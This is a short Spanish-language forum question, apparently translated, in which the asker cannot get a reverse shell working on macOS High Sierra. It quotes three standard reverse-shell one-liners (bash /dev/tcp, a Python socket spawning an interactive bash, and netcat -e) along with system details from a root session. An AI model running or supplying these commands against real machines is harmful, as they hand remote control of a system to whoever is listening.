Estoy intentando crear un oyente de shell inverso utilizando High Sierra pero nada parece funcionar.
El comando de bash simplemente se bloquea en el terminal y se agota el tiempo de espera.
bash -i >& /dev/tcp/0.0.0.0/8080 0>&1
Los errores del comando python con "Conexión rechazada" cuando se usa python o python v2.7.
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",8080));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
los errores del comando netcat con "nc: opción no válida -e"
nc -e /bin/bash 0.0.0.0 8080
He intentado otras soluciones que he encontrado en línea pero tienes la idea ...
¿Es posible crear una shell inversa (preferiblemente con acceso a bash) utilizando High Sierra?
especificaciones:
sh-3.2# system_profiler SPSoftwareDataType
Software:
System Software Overview:
System Version: macOS 10.13.4 (17E199)
Kernel Version: Darwin 17.5.0
Boot Volume: lily
Boot Mode: Normal
Computer Name: lily’s MacBook Air
User Name: System Administrator (root)
Secure Virtual Memory: Enabled
System Integrity Protection: Enabled
Time since boot: 2:03